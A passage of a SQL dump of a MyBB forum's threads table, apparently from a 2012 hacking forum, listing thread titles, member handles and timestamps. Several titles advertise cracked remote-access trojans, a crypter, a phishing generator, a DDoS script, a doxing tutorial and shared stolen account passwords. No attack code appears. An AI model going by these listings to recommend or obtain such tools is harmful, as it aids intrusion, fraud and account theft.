'0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('750', '3', 'Leaving', '0', '0', '0', '82', 'iTzIpod', '1349653476', '3828', '1349693290', 'mothered', '205', '25', '5', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('745', '59', '[Leak] Huge Folder of Ebooks', '0', '0', '0', '100', '??zg???g????61', '1349645213', '3798', '1349798076', '??zg???g????61', '100', '10', '3', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('746', '19', '[Junk]L33thacking wtf.....', '0', '0', '0', '222', 'Exposé', '1349645531', '3801', '1349652135', 't3h jok3r', '1', '23', '8', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('747', '3', 'L33THACKING WAS NEVER SOLD!', '0', '0', '0', '1', 't3h jok3r', '1349649678', '3809', '1349824722', 'The Anarchist', '246', '408', '57', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('749', '4', 'It\'s BreShiE!', '0', '0', '0', '232', 'BreShiE', '1349652059', '3822', '1349975765', '??zg???g????61', '100', '59', '16', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('748', '19', '[Junk][Junk][Junk]What the fuck is going on right now?', '0', '0', '0', '61', 'NXK', '1349651963', '3821', '1349652149', 'NXK', '61', '10', '2', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('751', '19', '[Junk]Regarding L33tforums.net', '0', '0', '0', '243', 'Anarchy $ucks', '1349654543', '3834', '1349654599', 't3h jok3r', '1', '4', '1', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('752', '19', '[Junk]t3h jok3r is a scammer', '0', '0', '0', '243', 'Anarchy $ucks', '1349654582', '3835', '1349654609', 't3h jok3r', '1', '1', '1', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('753', '19', '[Junk]Your site owner', '0', '0', '0', '243', 'Anarchy $ucks', '1349654724', '3838', '1349655068', 't3h jok3r', '1', '2', '1', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('754', '19', '[Junk]Your Site Owner', '0', '0', '0', '243', 'Anarchy $ucks', '1349654755', '3839', '1349655068', 't3h jok3r', '1', '2', '1', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('755', '19', '[Junk]Site Owner', '0', '0', '0', '243', 'Anarchy $ucks', '1349655220', '3845', '1349655277', 't3h jok3r', '1', '3', '1', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('757', '19', '[Junk]Site Owner', '0', '0', '0', '243', 'Anarchy $ucks', '1349656973', '3855', '1349657928', 't3h jok3r', '1', '3', '2', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('756', '19', '[Junk]Site Owner', '0', '0', '0', '243', 'Anarchy $ucks', '1349656077', '3851', '1349657941', 't3h jok3r', '1', '7', '1', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('759', '7', 'Join the LH Skype Group!', '0', '0', '0', '214', 'Rave™', '1349658994', '3871', '1349810820', 'Exposé', '222', '42', '11', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('758', '19', '[Junk]Site Owner', '0', '0', '0', '243', 'Anarchy $ucks', '1349658942', '3869', '1349661285', 't3h jok3r', '1', '4', '1', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('760', '19', '[Junk]The Site Owner', '0', '0', '0', '243', 'Anarchy $ucks', '1349659096', '3872', '1349661285', 't3h jok3r', '1', '9', '4', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('761', '52', 'wTools | Host To IP | Geo-IP | CloudFlare Resolver | AIO Skype Tools', '0', '0', '0', '232', 'BreShiE', '1349661078', '3882', '1349661078', 'BreShiE', '232', '13', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('762', '58', 'LH Coders: Official Group - Applications: OPEN', '0', '0', '0', '232', 'BreShiE', '1349666395', '3889', '1350202245', 'spacefish36', '8', '75', '6', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('763', '58', '[Announcement]Group Changes', '0', '0', '0', '61', 'NXK', '1349667886', '3891', '1349769715', 'R?????zo?', '62', '54', '11', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('764', '15', 'Hack Pack By Timmy | 2GB |', '0', '0', '0', '5', 'Timmy', '1349671302', '3895', '1350101902', 't3h jok3r', '1', '38', '5', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('765', '46', 'Vulcan Private Pisher Generator', '0', '0', '0', '7', 'Romdu62', '1349671864', '3901', '1352353831', 'XxTREYZxX', '257', '32', '4', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('766', '20', '[3/14] War - Crypter [ScanTime] by cris', '0', '0', '0', '7', 'Romdu62', '1349672344', '3902', '1352521603', 'Timmy', '5', '6', '1', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('767', '74', 'Do you cheat/hack games?', '0', '0', '3', '53', 'sirchamp', '1349702535', '3913', '1350113703', 'XxTREYZxX', '257', '29', '9', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('776', '16', 'What are some things you want SE\'d?', '0', '0', '0', '222', 'Exposé', '1349758573', '4012', '1349945714', 'R?????zo?', '62', '20', '5', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('768', '19', '[Junk]Site Owner 00', '0', '0', '0', '243', 'Anarchy $ucks', '1349714744', '3931', '1349719237', 't3h jok3r', '1', '5', '1', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('769', '23', 'Math Tools for all Subjects Cracked by Rave', '0', '0', '0', '214', 'Rave™', '1349727396', '3944', '1349921767', 'swa4567', '10', '10', '2', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('774', '19', '[Junk]What is expected of you!', '0', '0', '0', '222', 'Exposé', '1349750481', '3992', '1350705866', 't3h jok3r', '1', '16', '1', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('770', '19', '[Junk]Gyzano JDB', '0', '0', '0', '214', 'Rave™', '1349727499', '3945', '1352011253', 't3h jok3r', '1', '17', '2', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('771', '15', 'Skype Resolver Source', '0', '0', '0', '214', 'Rave™', '1349727619', '3946', '1349727619', 'Rave™', '214', '22', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('772', '58', 'Group Request', '0', '0', '0', '214', 'Rave™', '1349727750', '3947', '1350004591', 'Romdu62', '7', '39', '6', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('773', '9', 'Easy Money, Little Effort', '0', '0', '0', '241', 'Constrain', '1349731685', '3960', '1349731685', 'Constrain', '241', '17', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('775', '75', 'GTA San Andreas Cheats', '0', '0', '0', '4', 'Triple H', '1349752103', '3997', '1350562653', 'mothered', '205', '11', '3', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('777', '4', 'The Ultimatum has Arrived!', '0', '0', '0', '249', 'Ultimatum', '1349765088', '4018', '1349799585', 'R?????zo?', '62', '11', '3', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('778', '19', '[Junk]Gigbucks to Fiverr method', '0', '0', '0', '62', 'R?????zo?', '1349770109', '4022', '1349837710', 't3h jok3r', '1', '22', '3', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('779', '61', 'Get everything for FREE', '0', '0', '0', '62', 'R?????zo?', '1349770474', '4023', '1349945607', 'R?????zo?', '62', '6', '2', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('780', '17', 'Ultimate eWhoring Guide ? Never Seen Before ? $800/week! ?', '0', '0', '0', '62', 'R?????zo?', '1349770825', '4024', '1350374634', 'R?????zo?', '62', '16', '2', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('781', '61', '[LEAK] J0HNNYs ultimate Money Making Method $100-$200 daily!', '0', '0', '0', '62', 'R?????zo?', '1349771540', '4025', '1349771540', 'R?????zo?', '62', '3', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('782', '7', 'We need to advertise!', '0', '0', '0', '222', 'Exposé', '1349810253', '4052', '1350003167', 't3h jok3r', '1', '25', '5', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('783', '49', 'Enable who\'s viewing thread....', '0', '0', '0', '222', 'Exposé', '1349810641', '4054', '1349830062', 't3h jok3r', '1', '12', '4', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('786', '64', 'Awesome FREE site for watching latest anime and cartoons', '0', '0', '0', '100', '??zg???g????61', '1349824590', '4087', '1349872911', '??zg???g????61', '100', '12', '5', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('789', '19', '[Junk]ratters', '0', '0', '0', '203', 'NeonLights', '1349833034', '4106', '1350752043', 't3h jok3r', '1', '51', '16', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('785', '49', 'Install Tapatalk?', '0', '0', '0', '222', 'Exposé', '1349813687', '4067', '1349846236', 'Exposé', '222', '21', '6', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('788', '3', '4000 POSTS YEAH BABY!', '0', '0', '0', '1', 't3h jok3r', '1349829429', '4099', '1350225019', 'iTzIpod', '82', '81', '20', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('787', '75', 'Saints Row The Third Cheats + More!', '0', '0', '0', '194', 'Slender Man', '1349828988', '4097', '1350114181', 'XxTREYZxX', '257', '11', '1', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('791', '7', 'Are you a morning person?', '0', '0', '0', '205', 'mothered', '1349870340', '4134', '1349933392', '??????????¢™', '3', '19', '7', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('790', '58', 'Unique - Recruitment', '0', '0', '0', '62', 'R?????zo?', '1349863144', '4126', '1350170152', 'iTzIpod', '82', '55', '14', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('794', '54', 'New XXX Porn Passwords: 10 Oct 2012', '0', '0', '0', '62', 'R?????zo?', '1349883791', '4152', '1349883791', 'R?????zo?', '62', '2', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('792', '61', 'Unique - Rules [PLEASE READ]', '0', '0', '0', '62', 'R?????zo?', '1349871284', '4137', '1352589176', 'iTzIpod', '82', '35', '12', '', '1', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('793', '9', 'How To Make $5+ A Hour | Even Your Grandma Can Do It', '0', '17', '0', '228', 'VirtualLegend', '1349876465', '4145', '1349884989', 'VirtualLegend', '228', '19', '2', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('795', '15', 'GreameRAT 1.5', '0', '0', '0', '203', 'NeonLights', '1349886893', '4154', '1350752147', 't3h jok3r', '1', '7', '1', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('796', '15', 'CyberGate v1.18.0 Full Version Cracked', '0', '0', '0', '203', 'NeonLights', '1349886978', '4155', '1350752129', 't3h jok3r', '1', '7', '2', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('797', '15', 'DarkComet RAT v5.3.1', '0', '0', '0', '203', 'NeonLights', '1349887047', '4156', '1350752154', 't3h jok3r', '1', '7', '1', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('803', '4', 'bye LH fun knowing u', '0', '2', '0', '203', 'NeonLights', '1349919588', '4186', '1350093099', 'Apathy', '2', '81', '15', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('804', '42', 'Ninja caught in US Airport', '0', '0', '0', '10', 'swa4567', '1349923699', '4209', '1350098834', 'Triple H', '4', '22', '4', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('807', '34', '[ Get ] Ninja Graphics Kit For Free Worth $40 | All Graphics you need | Giveaway !!!', '0', '17', '0', '228', 'VirtualLegend', '1349957220', '4238', '1349969812', 'BreShiE', '232', '32', '3', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('815', '73', 'your favourite iOS games', '0', '0', '0', '62', 'R?????zo?', '1349983096', '4267', '1350152015', 'R?????zo?', '62', '12', '5', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('805', '47', 'Win 5 likes on your youtube video', '0', '0', '0', '53', 'sirchamp', '1349948717', '4223', '1349948717', 'sirchamp', '53', '6', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('806', '58', '[NEW] (Recruiting) DDoS\'ers - Join today', '0', '0', '0', '100', '??zg???g????61', '1350921780', '4225', '1350938583', 'iTzIpod', '82', '16', '1', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('808', '54', 'Huge list of NETFLIX accounts', '0', '0', '0', '62', 'R?????zo?', '1349970474', '4256', '1349970474', 'R?????zo?', '62', '5', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('816', '9', '| Do You Want To Get More Traffic | List of Traffic Exchange Sites |', '0', '17', '0', '228', 'VirtualLegend', '1349990491', '4276', '1350593906', 'XxTREYZxX', '257', '19', '3', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('817', '7', 'Favorite Quote?', '0', '0', '0', '82', 'iTzIpod', '1349992473', '4281', '1350035048', 'sirchamp', '53', '14', '5', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('809', '64', 'LIVE STREAM BASKETBALL / SOCCER/MMA/WWE/FOOTBALL/ESPN', '0', '0', '0', '62', 'R?????zo?', '1349971115', '4258', '1349971115', 'R?????zo?', '62', '2', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('810', '64', 'Good website\'s for Movie\'s to Watch', '0', '0', '0', '62', 'R?????zo?', '1349971244', '4259', '1350031148', 'R?????zo?', '62', '6', '2', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('822', '47', 'Huge Ultimate Graphics Pack Worth $2.400 | GIVEAWAY | Become A Pro GFX Designer |', '0', '17', '0', '228', 'VirtualLegend', '1350029946', '4302', '1351112339', 'Apathy', '2', '103', '16', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('811', '17', '100+ Pictures of Same Brunette | E-Whore Pack', '0', '0', '0', '62', 'R?????zo?', '1349971538', '4260', '1349971538', 'R?????zo?', '62', '9', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('812', '61', 'Skype resolvers [WEB BASED]', '0', '0', '0', '62', 'R?????zo?', '1349971694', '4261', '1352526024', 'p420', '9', '9', '2', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('813', '61', 'Ultimate Steam Cracking Pack', '0', '0', '0', '62', 'R?????zo?', '1349972205', '4262', '1349972205', 'R?????zo?', '62', '2', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('814', '14', 'How to Get a Free VPN (Lifetime)', '0', '0', '0', '62', 'R?????zo?', '1349972400', '4263', '1349972400', 'R?????zo?', '62', '10', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('819', '68', 'PHP DDoS Script', '0', '0', '0', '7', 'Romdu62', '1350005038', '4292', '1350249820', 'NXK', '61', '20', '3', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('818', '61', 'Leak Ultimate In-Depth Doxing Tutorial', '0', '0', '0', '62', 'R?????zo?', '1349993473', '4283', '1349993473', 'R?????zo?', '62', '1', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('820', '18', '[FREE]Youtube Bot - View increaser + 4,000 proxy list', '0', '0', '0', '7', 'Romdu62', '1350005599', '4293', '1350005599', 'Romdu62', '7', '7', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('821', '28', 'What\'s on your mind or what are your future plans?', '0', '0', '0', '5', 'Timmy', '1350006694', '4294', '1350684664', 'Exposé', '222', '49', '15', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('823', '8', 'Fifa 11 Soundtracks', '0', '10', '0', '228', 'VirtualLegend', '1350032389', '4306', '1350033148', 'R?????zo?', '62', '6', '1', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('824', '4', 'Glowing Here!', '0', '0', '0', '253', 'GlowingCapes', '1350035669', '4310', '1350099723', 'BreShiE', '232', '22', '5', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('825', '8', 'Favorite Rappers?', '0', '0', '0', '253', 'GlowingCapes', '1350037699', '4320', '1350442310', 'Exposé', '222', '19', '6', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('826', '7', 'L33T Hacking Tinychat Room', '0', '0', '0', '100', '??zg???g????61', '1350054899', '4325', '1350157315', 'iTzIpod', '82', '23', '5', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('827', '76', 'Playstation names', '0', '0', '0', '254', 'Greed', '1350057570', '4326', '1350121424', 'XxTREYZxX', '257', '24', '10', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('828', '71', 'Planetary Anhiliation', '0', '0', '0', '254', 'Greed', '1350058074', '4327', '1350114487', 'XxTREYZxX', '257', '7', '3', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('829', '74', 'Adventure Quest Worlds', '0', '0', '0', '254', 'Greed', '1350058283', '4328', '1350399326', 'D?ea', '264', '114', '37', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('830', '8', 'Feathery wings - Voltaire', '0', '0', '0', '254', 'Greed', '1350058812', '4331', '1350058812', 'Greed', '254', '2', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('831', '7', 'Join My GIVEAWAY', '0', '0', '0', '228', 'VirtualLegend', '1350064195', '4334', '1350064195', 'VirtualLegend', '228', '13', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('833', '3', 'New feature coming up!', '0', '0', '0', '1', 't3h jok3r', '1350099871', '4375', '1350164357', 'R?????zo?', '62', '37', '11', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('832', '25', '[News] Windows 8 security flaw', '0', '0', '0', '4', 'Triple H', '1350099105', '4370', '1350470741', 'mothered', '205', '16', '6', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('834', '64', 'The Marine DVDrip', '0', '0', '0', '5', 'Timmy', '1350100210', '4377', '1351391417', 'p420', '9', '7', '4', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('835', '24', 'Just purchased another Lappy', '0', '0', '0', '205', 'mothered', '1350101212', '4381', '1350268138', 'XxTREYZxX', '257', '9', '3', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('836', '30', 'Internet Download Manager [IDM] v6.12.22 + crack + skin', '0', '0', '0', '255', 'sbhshroy2', '1350101731', '4385', '1350201080', 't3h jok3r', '1', '13', '2', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('837', '54', '[13 October ]Brazzers,Bangbros,Mofos,Reality Kings....and many more.100 % working', '0', '0', '0', '255', 'sbhshroy2', '1350102258', '4387', '1350102258', 'sbhshroy2', '255', '2', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('838', '54', 'realitykings premium acount for 13/10/2012', '0', '0', '0', '255', 'sbhshroy2', '1350102320', '4388', '1350102320', 'sbhshroy2', '255', '1', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('839', '54', '[13.OKT]Brazzers,Bangbros,RK,...and more HUGE MIXXX OF WORKING PASSES FOR 13.OKT.2012', '0', '0', '0', '255', 'sbhshroy2', '1350102366', '4389', '1350461682', 'R?????zo?', '62', '15', '2', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('840', '4', 'Its andrew', '0', '0', '0', '256', 'Andrew', '1350102912', '4390', '1350170422', 'GlowingCapes', '253', '32', '10', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('841', '71', 'whats the best game ever made.', '0', '0', '0', '257', 'XxTREYZxX', '1350112172', '4392', '1350206491', 'XxTREYZxX', '257', '18', '5', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('1003', '54', '[20 Oct ] Premium Elite XXX Passes, All Checked And Working!!!', '0', '0', '0', '255', 'sbhshroy2', '1350708264', '5668', '1350708264', 'sbhshroy2', '255', '1', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('849', '73', 'when did you buy your ipod', '0', '0', '0', '257', 'XxTREYZxX', '1350126710', '4468', '1350252145', 'iTzIpod', '82', '30', '11', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('842', '71', 'Assasins creed 3', '0', '0', '0', '254', 'Greed', '1350113037', '4400', '1350125367', 'XxTREYZxX', '257', '18', '8', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('843', '73', 'whats the best IOS game ever', '0', '0', '0', '257', 'XxTREYZxX', '1350113351', '4404', '1350113351', 'XxTREYZxX', '257', '5', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('847', '76', 'add me on ps3', '0', '0', '0', '257', 'XxTREYZxX', '1350116850', '4425', '1350157635', 'iTzIpod', '82', '8', '1', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('844', '73', 'TEMPLE RUN CHEAT (UNLIMITED RUN)', '0', '8', '0', '257', 'XxTREYZxX', '1350115462', '4418', '1351558075', 'iTzIpod', '82', '23', '8', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('845', '72', 'whats better ps3 or xbox', '0', '0', '0', '257', 'XxTREYZxX', '1350115753', '4419', '1350183610', 'XxTREYZxX', '257', '90', '24', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('846', '74', 'another great pvp', '0', '0', '0', '257', 'XxTREYZxX', '1350116135', '4420', '1350163700', 'XxTREYZxX', '257', '11', '4', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('852', '71', 'Whats the best game you played?', '0', '0', '0', '254', 'Greed', '1350148668', '4487', '1350153816', 't3h jok3r', '1', '8', '1', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('857', '73', 'another great app on the Ipod', '0', '0', '0', '257', 'XxTREYZxX', '1350199816', '4581', '1350199816', 'XxTREYZxX', '257', '3', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('848', '12', 'can someone teach me how to hack a wifi connection', '0', '11', '0', '257', 'XxTREYZxX', '1350120079', '4435', '1350135816', 'sirchamp', '53', '13', '3', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('851', '9', 'Selling youtube views', '0', '0', '0', '53', 'sirchamp', '1350142176', '4483', '1350156940', 'NXK', '61', '26', '6', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('850', '63', 'anyone interested in making me a logo', '0', '0', '0', '257', 'XxTREYZxX', '1350132531', '4478', '1350264760', 'XxTREYZxX', '257', '43', '15', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('853', '59', 'My Way Of Spreading Method And Get Tons Of Installs', '0', '0', '0', '62', 'R?????zo?', '1350152433', '4502', '1350755241', 'R?????zo?', '62', '14', '3', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('854', '7', 'Boasting thread', '0', '0', '0', '53', 'sirchamp', '1350155819', '4510', '1350207006', 'sirchamp', '53', '27', '9', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('856', '42', 'Anonymous Project Mayhem 2012 | Dangerous Idea #1 / Leak it ALL!', '0', '0', '0', '61', 'NXK', '1350174607', '4566', '1350245117', 'Greed', '254', '29', '5', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('855', '74', 'need a minecraft account (premium)', '0', '0', '0', '257', 'XxTREYZxX', '1350165520', '4547', '1350352739', 'iTzIpod', '82', '40', '13', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('858', '73', 'A new series', '0', '8', '0', '257', 'XxTREYZxX', '1350200278', '4582', '1350200278', 'XxTREYZxX', '257', '3', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('859', '7', 'Absence for 4 days', '0', '0', '0', '53', 'sirchamp', '1350201920', '4592', '1350232579', 'NXK', '61', '15', '6', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('860', '52', '[tut] Creating a chat spammer', '0', '0', '0', '8', 'spacefish36', '1350202099', '4593', '1350202099', 'spacefish36', '8', '5', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('861', '7', 'L33T Hacking Milestones', '0', '0', '0', '1', 't3h jok3r', '1350203089', '4598', '1352604446', 'iTzIpod', '82', '204', '55', '', '1', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('862', '71', 'Mount and Blade 2 BannerLord', '0', '0', '0', '254', 'Greed', '1350218785', '4610', '1350252970', 'Greed', '254', '9', '2', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('863', '28', 'Hello other Elite people out there', '0', '0', '0', '254', 'Greed', '1350219712', '4611', '1350219712', 'Greed', '254', '5', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('865', '73', 'that great app series 1', '0', '0', '0', '257', 'XxTREYZxX', '1350261994', '4687', '1350261994', 'XxTREYZxX', '257', '8', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('864', '79', 'Need some coder to check this code', '0', '0', '0', '1', 't3h jok3r', '1350233613', '4640', '1351506225', 'HoverCatz', '67', '15', '3', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('866', '7', 'Anyone trade paypal for a DC?', '0', '0', '0', '222', 'Exposé', '1350262958', '4692', '1350262958', 'Exposé', '222', '8', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('867', '71', 'Fifa 13', '0', '0', '0', '257', 'XxTREYZxX', '1350266621', '4709', '1350301150', 'iTzIpod', '82', '7', '1', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('868', '71', 'whats the best COD', '0', '0', '0', '257', 'XxTREYZxX', '1350266862', '4710', '1351480335', 'iTzIpod', '82', '19', '8', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('869', '74', 'who loves counter strike', '0', '0', '0', '257', 'XxTREYZxX', '1350267665', '4712', '1350418780', 'XxTREYZxX', '257', '18', '7', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('1001', '7', 'Shady URL', '0', '0', '0', '205', 'mothered', '1350707012', '5660', '1350821267', 'mothered', '205', '38', '11', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('870', '74', 'Great minecraft pvp <JOIN> -150 slots', '0', '0', '0', '257', 'XxTREYZxX', '1350267872', '4713', '1350267872', 'XxTREYZxX', '257', '2', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('871', '65', 'What\'s Your Top 3 Movies?', '0', '0', '0', '205', 'mothered', '1350268067', '4715', '1350346828', 'VirtualLegend', '228', '12', '4', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('872', '24', 'Windows Updates, who uses It?', '0', '0', '0', '205', 'mothered', '1350268175', '4717', 